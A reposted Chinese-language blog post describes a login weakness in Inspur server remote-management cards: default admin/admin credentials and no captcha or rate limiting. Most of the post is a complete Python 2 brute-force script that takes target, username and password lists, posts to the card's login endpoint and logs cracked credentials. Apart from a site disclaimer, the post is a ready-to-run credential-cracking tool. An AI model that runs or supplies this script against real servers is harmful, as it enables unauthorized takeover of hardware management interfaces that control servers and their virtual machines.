浪潮遠控卡的登錄爆破漏洞


一、浪潮遠控卡簡介

浪潮遠控卡是一款插在服務器上的,方便運維人員和服務器管理人員對服務器進行遠程控制的WEB服務,其在80端口對外提供HTTP服務。登錄進去以后可以對服務器硬件進行遠程控制和管理。例如CPU、內存等性能指標監控,遠程開啟關閉服務器上的虛擬機,甚至作為控制虛擬主機的跳板機。

二、浪潮遠控卡的漏洞:

浪潮遠控卡可以嘗試使用admin/admin進行登錄嘗試,很有可能可以進去。另外浪潮遠控卡登錄沒有驗證碼,沒有頻率測試限制,可以輕松使用burpsuite進行登錄爆破嘗試。

然后就可以登錄了,當然寫爆破腳本。設置好報文頭,直接發起請求POST請求就可以。

  1 #!/usr/bin/env python
  2 # -*- coding:utf-8 -*-
  3 
  4 #import lib files
  5 import os
  6 import sys
  7 import logging
  8 import requests
  9 from optparse import OptionParser
 10 
 11 #global configuration set
 12 reload(sys)
 13 sys.setdefaultencoding("utf-8")
 14 logging.basicConfig(format='%(asctime)s-%(message)s',datefmt='%Y-%m-%d %H:%M:%S %p',level=logging.INFO)
 15 
 16 #global varites defines
 17 HEADER = {
 18     "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0",
 19     "Accept":"application/json, text/plain, */*",
 20     "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
 21     "Accept-Encoding":"gzip, deflate",
 22     "Content-Type":"application/json;charset=utf-8"
 23 }
 24 SUCCESS_FLAG = "SESSION_COOKIE"
 25 USERNAME_LIST = ["admin"]
 26 PASSWORD_LIST = ["admin"]
 27 
 28 #global functions defines
 29 def config_read_from_file(userfile,pswdfile):
 30     global USERNAME_LIST
 31     global PASSWORD_LIST
 32     logging.info("[+] Read Configuration From File ...")
 33     try:
 34         with open(userfile,"r") as fr:
 35             for line in fr.readlines():
 36                 line = line.split("\n")[0].split("\r")[0]
 37                 USERNAME_LIST.append(line)
 38     except Exception,ex:
 39         logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)
 40         logging.error(logstr)
 41         logging.info("[+] Use Default Dict!")
 42     try:
 43         with open(pswdfile,"r") as fr:
 44             for line in fr.readlines():
 45                 line = line.split("\n")[0].split("\r")[0]
 46                 PASSWORD_LIST.append(line)
 47     except Exception,ex:
 48         logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)
 49         logging.error(logstr)
 50         logging.info("[+] Use Default Dict!")
 51     return 0
 52 
 53 def login_packet_send(target,username,password):
 54     login_data = {"WEBVAR_USERNAME":username,"WEBVAR_PASSWORD":password}
 55     try:
 56         response = requests.post("http://%s/rpc/WEBSES/create.asp"%str(target),headers=HEADER,data=login_data,timeout=5)
 57     except Exception,ex:
 58         logstr = "[-] Connect Failed Reason:%s"%str(ex)
 59         logging.error(logstr)
 60         return -1
 61     if response.status_code != 200:
 62         return -1
 63     else:
 64         return response.content
 65 
 66 def vuln_check(content):
 67     if content.find(SUCCESS_FLAG) >= 0 and content.find("Failure_Login_IPMI_Then_LDAP_then_Active_Directory_Radius") < 0:
 68         return 0
 69     else:
 70         return -1
 71 
 72 def crack(target,username,password):
 73     content = login_packet_send(target,username,password)
 74     if content != -1:
 75         if vuln_check(content) == 0:
 76             logging.info("[*] Crack %s Success! Username:%s,Password:%s"%(str(target),str(username),str(password)))
 77             return 0
 78     return -1
 79 
 80 def scan(target,targettype):
 81     targetlist = []
 82     if targettype == 1:
 83         try:
 84             with open(target,"r") as fr:
 85                 for line in fr.readlines():
 86                     line = line.split("\n")[0].split("\r")[0].replace(" ","")
 87                     targetlist.append(line)
 88         except Exception,ex:
 89             pass
 90     else:
 91         targetlist = [target]
 92     if len(target) > 0:
 93         for item in targetlist:
 94             for user in USERNAME_LIST:
 95                 for pswd in PASSWORD_LIST:
 96                     crack(item,user,pswd)
 97 
 98 #main function -- programme
 99 if __name__ == "__main__": 
100     parser = OptionParser()
101     parser.add_option("-t", "--target", dest="target",help="target to check")
102     parser.add_option("-f", "--filename", dest="targetfile",help="targetfiel to check")
103     parser.add_option("-u", "--userfile", dest="userfile",help="username dict")
104     parser.add_option("-p", "--pswdfile", dest="pswdfile",help="password dict")
105     (options, args) = parser.parse_args()
106     config_read_from_file(options.userfile,options.pswdfile)
107     if options.target not in ["",None," "]:
108         scan(options.target,0)
109     elif options.targetfile not in ["",None," "]:
110         scan(options.targetfile,1)

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM